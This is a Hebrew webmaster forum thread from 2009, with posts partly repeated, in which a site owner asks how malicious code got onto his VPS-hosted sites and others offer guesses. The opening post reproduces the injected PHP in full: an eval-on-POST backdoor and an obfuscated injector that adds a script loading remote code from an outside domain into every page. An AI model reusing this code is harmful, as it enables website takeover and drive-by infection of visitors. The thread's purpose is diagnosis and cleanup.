בעיה| השתלת קוד זדוני באתר - הוסטס

3D0m · 09-05-09, 08:38

שלום לכם.
לאחרונה גולשי האתר שלי הודיעו לי מספר פעמים שקיים אצלי וירוס באתר, שמבקש מהם להוריד כל פעם סוג קובץ אחר.
בדקתי את העניין, ומצאתי סקריפט שהושתל אצלי, וכל פעם הוא נראה קצת שונה.
זהו הקוד שהושתל במערכת הפורומים שלי:

קוד:

<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbih0KXtldmFsKHVuZXNjYXBlKCgnPDc2YTw3MjwyMGE8M2Q8MjJTPDYzPDcyPDY5PDcwPDc0RW5nPDY5bmU8MjI8MmNiPDNkPDIyVjw2NXJzaW9uPDI4KSs8MjI8MmNqPDNkPDIyPDIyPDJjdTwzZG48NjE8NzZpZ2F0b3I8MmV1czw2NTw3MkFnPDY1PDZlPDc0PDNiaWY8MjgoPDc1PDJlaTw2ZWRleDw0ZmYoPDIyV2luPDIyKTwzZTApPDI2PDI2KHU8MmVpbmRleDw0ZmYoPDIyPDRlVDwyMDY8MjIpPDNjMCk8MjY8MjY8MjhkPDZmY3VtZW50PDJlY29vazw2OWU8MmVpbjw2NDw2NXhPZig8MjJtPDY5ZWs8M2QxPDIyKTwzYzApPDI2PDI2KHR5PDcwZW9mKHpydjw3YXRzKTwyMTwzZHR5PDcwZW9mKDwyMkE8MjI8MjkpKTw3Ynpydnp0czwzZDwyMkE8MjI8M2JlPDc2YWwoPDIyPDY5ZjwyOHdpbmRvdzwyZTwyMithKzwyMilqPDNkais8MjIrYSs8MjJNYTw2YW88NzI8MjIrYis8NjErPDIyPDRkaTw2ZW88NzI8MjIrYjwyYmErPDIyQnU8NjlsZDwyMitiKzwyMmo8M2I8MjIpPDNiZG88NjN1bTw2NW50PDJld3JpdGUoPDIyPDNjc2NyaTw3MHQ8MjBzcmM8M2Q8MmY8MmZndW1iPDZjYXI8MmVjbjwyZnJzczwyZjwzZjw2OWQ8M2Q8MjIrPDZhKzwyMjwzZTwzYzw1YzwyZnNjcmk8NzA8NzQ8M2U8MjIpPDNiPDdkJykucmVwbGFjZSh0LCclJykpKX0pKC88L2cpOwogLS0+PC9zY3JpcHQ+'));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>

אותו קוד הושתל גם באתר אחר שלי.
עכשיו ככה, שני האתרים האלה מאוחסנים על אותו VPS בחשבונות שונים, אבל כנראה זה הועבר בדרך כלשהי לשאל הקבצים בשרת. (ולא כל הקבצים נדבקים בזה, רק חלקם, כמו קבצי הגדרות config).

*אני לא מבקש תמיכה במערכת מוכנה, אני מבקש לדעת אם אתם מכירים את הקוד או הדרך בה השתילו לי אותו, בכדי שאוכל לחסום את זה.
תודה מראש.

עריכה: יכול להיות שהוא הושתל דרך טופס או משהו?

בניה · 09-05-09, 08:47

כנראה זה וירוס במחשב שלך, שכשאתה מתחבר לשרת FTP כל שהוא הוא משתיל קוד בכל דפי האינטרנט שהוא מוצא שם.
מה שאתה יכול זה א. להשתמש ב WEBFTP כל שהוא כדי להעיף אותו.
ב. לעשות סריקת וירוסים.

http://www.webftp.co.uk/index.php
WEBFTP

3D0m · 09-05-09, 08:52

חשבתי על האפשרות הזאת שיש לי וירוסים במחשב, ועשיתי מספר סריקות עם nod32,kaspersky,ad-aware
ולגבי האתר שציינת (http://www.webftp.co.uk) הוא אתר אמין? שלא אתן את פרטי השרת וזה יגרום לבעיות..

intercooler3819 · 09-05-09, 10:37

ממ אין לך סיבה לחשוב שזה אצלך אם סרקת

לרוב כשפורצים אתר אחד ניתן לפרוץ את כל האתרים שיושבים בשרת (במקרה שלך ברמה של VPS) שעליו יושב האתר

תנסה לתת גישות מחודשות למרות שאם יש לך חור אבטחה זה לא יעזור והפריצות יהיו חוזרות ונשנות

3D0m · 09-05-09, 10:44

עדיין נראה לי שזה יותר מקרה של הזרקה או משהו (לא מבין בהאקינג).
עברתי לשרת חדש רק אתמול, וזה קרה שוב.
למישהו יש עצה בשבילי כדי למנוע את זה?

גורילה · 09-05-09, 10:58

תבדוק שאין לך קבצים זדוניים במערכת.

moni1x09 · 09-05-09, 11:09

לפעמים יש מצב שמישהו שתל לך קובץ על השרת שעורך קבצים בעלי הרשאת 777 (כמו הקונפיג הנחמד שלך)

בכל מקרה, תעבור קובץ קובץ ותחפש קוד חשוד(מקווה שזה לא הבנוייקר או מערכת גדולה :S)

אדיר · 09-05-09, 11:34

אני דווקא חושב יותר על הכיוון של בעיות אבטחה בשרת (וככה אפשר לגשת לתקיות של כל המשתמשים),
צור קשר במסן ואני אעזור לך לבדוק האם זאת באמת פרצה בשרת.

SniR-S · 09-05-09, 12:46

אולי וירוס שיושב לך איזה קובץ במקום כלשהו בשרת, ואם אתה מוחק את הקודדד הוא כל כמה זמן משכפל את עצמו..

בניה · 09-05-09, 14:41

ציטוט:

נכתב במקור על ידי בניה

כנראה זה וירוס במחשב שלך, שכשאתה מתחבר לשרת FTP כל שהוא הוא משתיל קוד בכל דפי האינטרנט שהוא מוצא שם.
מה שאתה יכול זה א. להשתמש ב WEBFTP כל שהוא כדי להעיף אותו.
ב. לעשות סריקת וירוסים.

http://www.webftp.co.uk/index.php
WEBFTP

אני משתמש באתר הזה כבר הרבה זמן ולא פרצו לי או משהו.
והיו כבר דיונים על הוירוס הזה פה באתר ואמרו שזה משהו במחשב שלך ולא על השרת

09-05-09, 08:47	# 2
בניה משתמש - היכל התהילה מיני פרופיל תאריך הצטרפות: Oct 2005 מיקום: נחושה הודעות: 3,434	כנראה זה וירוס במחשב שלך, שכשאתה מתחבר לשרת FTP כל שהוא הוא משתיל קוד בכל דפי האינטרנט שהוא מוצא שם. מה שאתה יכול זה א. להשתמש ב WEBFTP כל שהוא כדי להעיף אותו. ב. לעשות סריקת וירוסים. http://www.webftp.co.uk/index.php WEBFTP __________________ קו ישר, כי אפשר גם אחרת

09-05-09, 10:37	# 4
intercooler3819 חבר וותיק מיני פרופיל תאריך הצטרפות: Jul 2008 הודעות: 1,056	ממ אין לך סיבה לחשוב שזה אצלך אם סרקת לרוב כשפורצים אתר אחד ניתן לפרוץ את כל האתרים שיושבים בשרת (במקרה שלך ברמה של VPS) שעליו יושב האתר תנסה לתת גישות מחודשות למרות שאם יש לך חור אבטחה זה לא יעזור והפריצות יהיו חוזרות ונשנות __________________

09-05-09, 10:58	# 6
גורילה עסק רשום [?] מיני פרופיל תאריך הצטרפות: Apr 2009 הודעות: 581	תבדוק שאין לך קבצים זדוניים במערכת. __________________ בניית אתרים

09-05-09, 11:34	# 8
אדיר עסק רשום [?] מיני פרופיל תאריך הצטרפות: Mar 2008 מיקום: אשקלון הודעות: 1,714	אני דווקא חושב יותר על הכיוון של בעיות אבטחה בשרת (וככה אפשר לגשת לתקיות של כל המשתמשים), צור קשר במסן ואני אעזור לך לבדוק האם זאת באמת פרצה בשרת. __________________ LinkedIn \| אני, אדיר \| העלאת תמונות


	ההרשמה לפורום נפתחה - אפשרות רישום לכל אימייל (דומיינים פרטיים, gmail, הוטמייל..)!

09-05-09, 08:52	# 3
3D0m חבר בקהילה מיני פרופיל תאריך הצטרפות: Jul 2008 הודעות: 66	חשבתי על האפשרות הזאת שיש לי וירוסים במחשב, ועשיתי מספר סריקות עם nod32,kaspersky,ad-aware ולגבי האתר שציינת (http://www.webftp.co.uk) הוא אתר אמין? שלא אתן את פרטי השרת וזה יגרום לבעיות..

09-05-09, 10:44	# 5
3D0m חבר בקהילה מיני פרופיל תאריך הצטרפות: Jul 2008 הודעות: 66	עדיין נראה לי שזה יותר מקרה של הזרקה או משהו (לא מבין בהאקינג). עברתי לשרת חדש רק אתמול, וזה קרה שוב. למישהו יש עצה בשבילי כדי למנוע את זה?

09-05-09, 11:09	# 7
moni1x09 חבר מתקדם מיני פרופיל תאריך הצטרפות: Apr 2009 מיקום: איזור הודעות: 561	לפעמים יש מצב שמישהו שתל לך קובץ על השרת שעורך קבצים בעלי הרשאת 777 (כמו הקונפיג הנחמד שלך) בכל מקרה, תעבור קובץ קובץ ותחפש קוד חשוד(מקווה שזה לא הבנוייקר או מערכת גדולה :S)

09-05-09, 12:46	# 9
SniR-S חבר מתקדם מיני פרופיל תאריך הצטרפות: Aug 2008 הודעות: 546	אולי וירוס שיושב לך איזה קובץ במקום כלשהו בשרת, ואם אתה מוחק את הקודדד הוא כל כמה זמן משכפל את עצמו..

חברים פעילים הצופים באשכול זה: 1 (0 חברים ו- 1 אורחים)